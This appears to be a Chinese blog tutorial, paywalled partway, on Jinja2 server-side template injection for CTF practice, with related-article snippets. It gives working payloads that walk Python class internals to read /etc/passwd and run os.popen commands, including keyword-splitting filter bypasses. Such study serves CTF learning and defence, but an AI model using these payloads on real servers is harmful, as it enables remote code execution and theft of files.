SSTI模板注入及绕过姿势(基于Python-Jinja2)

最新推荐文章于 2025-07-20 22:56:43 发布
原创 最新推荐文章于 2025-07-20 22:56:43 发布 · 1.6w 阅读 · 134 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

前言:​SSTI(服务端模板注入),已然不再是一个新话题,近年来的CTF中还是也经常能遇到的,比如护网杯的easy_tonado、TWCTF的Shrine,19年的SCTF也出了Ruby ERB SSTI的考点;本篇对这部分总结一下,方便未来做题和复习的时候查阅!也欢迎各路大佬在评论区指正或者放出自己的WP链接互相学习!

文章目录

各框架模板结构:(网图)

在这里插入图片描述

前置知识

简介

首先​简单说一下什么是SSTI(Server-Side Template Injection);即模板注入,与我们熟知的SQL注入、命令注入等原理大同小异。注入的原理可以这样描述:当用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中变成了程序的一部分,从而改变了程序的执行逻辑;
漏洞成因在于:render_template函数在渲染模板的时候使用了%s来动态的替换字符串,我们知道Flask 中使用了Jinja2 作为模板渲染引擎,{ {}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{ {}}包裹的内容当做变量解析替换。比如{ {1+1}}会被解析成2。

利用流程

获取基本类->获取基本类的子类->在子类中找到关于命令执行和文件读写的模块

常用函数

__class__ 返回调用的参数类型
__bases__ 返回类型列表
__mro__ 此属性是在方法解析期间寻找基类时考虑的类元组
__subclasses__() 返回object的子类
__globals__ 函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

常见Payload

文件读取


# python3

{
   
   {
   
   ().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('cat /fl4g|base64').read()}}

# python2

{
   
   {
   
   ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

新发现的新利用(赶紧收集了)

[].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('ls').read()

通用命令执行


{
   
   % for c in [].__class__.__base__.__subclasses__() %}
  {
   
   % if c.__name__ == 'catch_warnings' %}
    {
   
   % for b in c.__init__.__globals__.values() %}
      {
   
   % if b.__class__ ==
最低0.47元/天 解锁文章

200万优质内容无限畅学
ssti绕过姿势总结
会点三脚猫功夫。
07-06 268
摘要:本文总结了7种SSTI(服务器端模板注入)攻击方法,从基础测试到高级绕过技术。包括直接执行系统命令、子类枚举Popen、绕过点与下划线过滤(使用数组访问和Hex转义)、利用attr过滤器链、通过config.items()和子类枚举组合攻击,以及动态for循环筛选执行等技巧。每种方法均提供具体payload示例,适用于不同过滤场景,展现了从简单到复杂的SSTI利用技术演进路径。
python安全之SSTI模板注入
世间繁华梦一出
08-11 522
python安全——SSTI模板注入SSTI模板注入原理解释 SSTI模板注入原理解释 参考链接 https://xz.aliyun.com/t/7746 SSTI模板注入检测及攻击工具:tplmap
Python SSTI漏洞原理与基础利用以及Fenjing的使用教程
最新发布
2301_79944585的博客
07-20 1320
它不是用户定义的,而是 Jinja2 模板中可以直接访问的。​​| attr​​ 是 Jinja2 的过滤器,功能类似 Python 的 getattr(),允许通过字符串动态获取属性(如 lipsum | attr(“__globals__”)),从而避免直接暴露敏感关键字(如 __globals__)。Python是一种面向对象的语言,所有的数据类型都是对象,而对象是由类定义的。cycler 是 Jinja2 中的一个 内置对象,用于在模板中循环使用一组值(比如在循环中交替使用不同的 CSS 样式)。
SSTI注入WAF绕过
zkaq7777777的博客
06-03 1282
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎?模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
python SSTI注入
weixin_44843084的博客
06-21 909
https://www.jianshu.com/p/a77c50dfebcb https://xz.aliyun.com/t/3679#toc-9 SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ...
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 1277
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti注入python21.2.3.4.5.6.python31.2.
pythonssti模板注入
My笔记的博客
04-16 1092
类似于python 中的type方法。
SSTI模板注入(jinja2)
weixin_74020633的博客
03-30 1150
前面学习了SSTI中的smarty类型,今天学习了Jinja2,两种类型都是flask框架的,但是在注入的语法上还是有不同SSTI:服务器端模板注入,也属于一种注入类型。与sql注入类似,也是通过凭借进行命令的执行,sql是和数据库的查询语句进行拼接。SSTI是在后端的渲染进行拼接,SSTI主要是运用在目前的网站框架下。经过查询资料,SSTI漏洞产生的原因:因为在函数渲染时,对于用户输入的变量没有进行渲染,才会导致漏洞的出现附上一张经典判断SSTI模板类型的图。
2025.2.8——二、Confusion1 SSTI模板注入|Jinja2模板
2402_87387800的博客
02-10 1030
题目来源:攻防世界 Confusion1。
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
在本文中,我们将深入探讨Flask框架使用的Jinja2模板引擎的SSTI漏洞及其绕过策略。 Flask是一个轻量级的Python Web应用框架,而Jinja2是它默认的模板引擎。Jinja2允许开发者通过模板语言来动态生成HTML或其他格式的...
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 2210
1、过滤了中括号 2、过滤了双下划线 3、过滤了单下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
Python 开发 框架安全:SSTI 模板注入漏洞测试.
网络安全领域___专研者.
05-11 809
SSTI (Server-Side Template Injection) 是一种Web应用程序安全漏洞,它发生在应用程序使用模板引擎渲染用户输入时。当应用程序将用户输入直接插入到模板中而不进行充分的过滤和验证时,就可能导致SSTI漏洞。攻击者可以利用这个漏洞注入恶意代码到模板中,从而执行任意命令,窃取敏感信息或者进一步渗透系统。
SSTIpython模板注入)整理
一只懒猫的博客
04-08 798
在使用django框架进行web应用设计时,不规范的代码使用。常用的的dgango代码为:还可以设置动态网址,python使用的web框架可以使用以下方法进行测试。
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 4492
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
python模板注入_SSTI模板注入
weixin_35186171的博客
02-10 923
SSTI是个啥?SSTI(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理...
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 4106
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
Python中的SSTI ()
qq_43511094的博客
03-21 6417
模板注入什么是Flask什么是SSTI什么是JinJa2什么是模板引擎Jinja2 详细知识基本语法基本用法一般用法for语句的使用if 语句继承filter 语句的使用空白行处理类的详细知识SSTI的payloadpopen()方法python中的SSTI常用的payload 什么是Flask Flask是一个轻量级的python的web框架。轻量级说明他只适用于构建小型网站。 什么是SSTI SSTI,Server-Site Template Injection,即服务器模板注入。同XSS注入,SQL
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 1104
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 2万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
ssti模板注入jinja2
01-19
### Jinja2 SSTI 攻击原理 在Web应用程序中,如果开发者允许用户输入的数据未经严格验证就传递给模板引擎进行渲染,则可能导致服务器端模板注入(Server-Side Template Injection, SSTI)。对于基于Jinja2的框架而言,攻击者可以通过精心构造恶意输入来执行任意代码。 #### 利用过程示例 假设存在一个简单的Flask应用,其中包含如下代码片段: ```python from flask import Flask, render_template_string app = Flask(__name__) @app.route('/unsafe/<string:name>') def unsafe(name): template = f'Hello {name}' return render_template_string(template) if __name__ == '__main__': app.run(debug=True) ``` 上述实现方式非常危险,因为`render_template_string()`函数直接将未经过滤的名字参数作为模板的一部分进行了渲染。此时,攻击者可以提交特殊构造的字符串,例如`{{7*7}}`,这将会使服务返回计算结果而不是原始文本[^1]。 更进一步地,通过访问路径 `/unsafe/{{''.__class__.__mro__[2].__subclasses__()}}` ,攻击者可以获得当前环境中所有已加载类的对象列表,从而可能发现可用于远程命令执行或其他形式提权操作的具体实例[^3]。 然而值得注意的是,在实际渗透测试过程中应当遵循合法授权范围内的活动准则;非法入侵他人计算机信息系统属于违法行为。 ### 防护建议 为了防止此类漏洞的发生,应该采取以下几种策略之一或组合使用: - **最小权限原则**:确保运行Web应用程序的服务进程仅具有完成工作所需的最低限度的操作系统级权限。 - **禁用调试模式**:生产环境下的部署应关闭任何不必要的功能选项,特别是那些涉及动态编译或解释器交互的功能开关。 - **白名单校验机制**:对传入的应用逻辑控制流影响较大的变量实施严格的格式化检查,只接受预期之内安全值域内的输入项。 - **自定义沙箱环境**:针对特定场景定制化的限制性上下文空间内解析并执行模板指令集,阻止潜在危害扩散至整个宿主平台之外。 - **更新依赖库版本**:定期审查项目所使用的第三方组件清单,并及时升级到最新稳定发行版以修复已知的安全隐患[^2]。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值